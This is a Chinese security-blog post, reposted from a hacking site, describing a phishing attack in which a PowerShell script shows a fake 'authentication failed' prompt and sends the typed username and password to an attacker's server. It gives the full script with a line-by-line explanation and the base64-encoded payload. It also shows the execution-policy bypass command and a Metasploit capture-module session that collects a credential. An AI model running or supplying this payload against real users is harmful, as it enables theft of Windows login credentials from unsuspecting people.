记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

[组合拳]Powershell弹出窗口+ Capture模块

2015-02-01 18:00

Metasploit Minute已经进入第三季。接下来我们将会使用Metasploit的Capture模块从这个PowerShell弹出中捕获权限。不需要admin,不需要UAC绕过,仅仅是通过SSL就可以了。

这里是代码

$cred =$host.ui.promptforcredential('FailedAuthentication','',[Environment]::UserDomainName + "\" +[Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback= {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable(Red Hat modified)");
$wc.Proxy =[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username,$cred.getnetworkcredential().password, '');
$result= $wc.downloadstring('https://172.16.102.163');

我们一行一行的分解看

$cred= $host.ui.promptforcredential('FailedAuthentication','',[Environment]::UserName,[Environment]::UserDomainName);

窗口提示输入凭证,标题显示“身份验证失败”,但是其他地方就没有什么内容显示了(使用的是默认设置),框中包括用户名以及域名增加其真实性。

[System.Net.ServicePointManager]::ServerCertificateValidationCallback= {$true};

让PowerShell不验证SSL证书(允许后面我们可以使用自签署的证书进行HTTPS服务)

$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable(Red Hat modified)");

创建一个新的Web用户项目,并将user-agent设置为wget

$wc.Proxy =[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials= [System.Net.CredentialCache]::DefaultNetworkCredentials;

告诉PowerShell无论当前用户使用proxy连接还是其他方式,如果不重要那么就忽略掉。

$wc.credentials = new-objectsystem.net.networkcredential($cred.username,$cred.getnetworkcredential().password, '');

告诉PowerShell,基于HTTP的认证的用户在弹出框中需要输入最近的记录。

$result =$wc.downloadstring('https://172.16.102.163');

最后在Metasploit中利用capture模块

cat power.txt | iconv --to-code UTF-16LE |base64
 
JABjAHIAZQBkACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAHAAcgBvAG0AcAB0AGYAbwByAGMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAEYAYQBpAGwAZQBkACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACcALAAnACcALABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUAIAArACAAIgBcACIAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBOAGEAbQBlACwAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBEAG8AbQBhAGkAbgBOAGEAbQBlACkAOwAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsACgAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiACwAIgBXAGcAZQB0AC8AMQAuADkAKwBjAHYAcwAtAHMAdABhAGIAbABlACAAKABSAGUAZAAgAEgAYQB0ACAAbQBvAGQAaQBmAGkAZQBkACkAIgApADsACgAkAHcAYwAuAFAAcgBvAHgAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsACgAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsACgAkAHcAYwAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAYwByAGUAZABlAG4AdABpAGEAbAAoACQAYwByAGUAZAAuAHUAcwBlAHIAbgBhAG0AZQAsACAAJABjAHIAZQBkAC4AZwBlAHQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAuAHAAYQBzAHMAdwBvAHIAZAAsACAAJwAnACkAOwAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcAMgAuADEANgAuADEAMAAyAC4AMQA2ADMAJwApADsACgA=

然后执行

powershell -ep bypass -enc <the encoded textfrom above>

你可以得到一下这张图

root@wpad:~/metasploit-framework#./msfconsole -Lq
msf > useauxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options
 
Module options(auxiliary/server/capture/http_basic):
 
  Name         Current Setting  Required Description
  ----         ---------------  -------- -----------
  REALM        Secure Site      yes      The authentication realm you'd like to present.
  RedirectURL                  no        The page to redirectusers to after they enter basic auth creds
  SRVHOST      0.0.0.0          yes       The local host to listen on. This mustbe an address on the local machine or 0.0.0.0
  SRVPORT      80               yes       The local port to listen on.
  SSL          false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSLcertificate (default is randomly generated)
  SSLVersion   SSL3             no        Specify the version of SSL that shouldbe used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for thisexploit (default is random)
 
msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*] Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140   http_basic - Sending 401 to client172.16.102.140
[+] 172.16.102.140 -Credential collected: "SITTINGDUCK\user:ASDqwe123" => /

 

Game Over

这篇文搭配视频会比较有代入感。

最后送上传送门

https://www.youtube.com/watch?v=H_E3FNF8rBw

链接:http://pan.baidu.com/s/1eQvkw6Y 密码:mysb[小水管,画质不是很好]

【via@91RI.ORG团队】

知识来源: www.91ri.org/12220.html

阅读:105489 | 评论:0 | 标签:渗透实例 linux metasploit 渗透测试

想收藏或者和大家分享这篇好文章→复制链接地址

“[组合拳]Powershell弹出窗口+ Capture模块”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云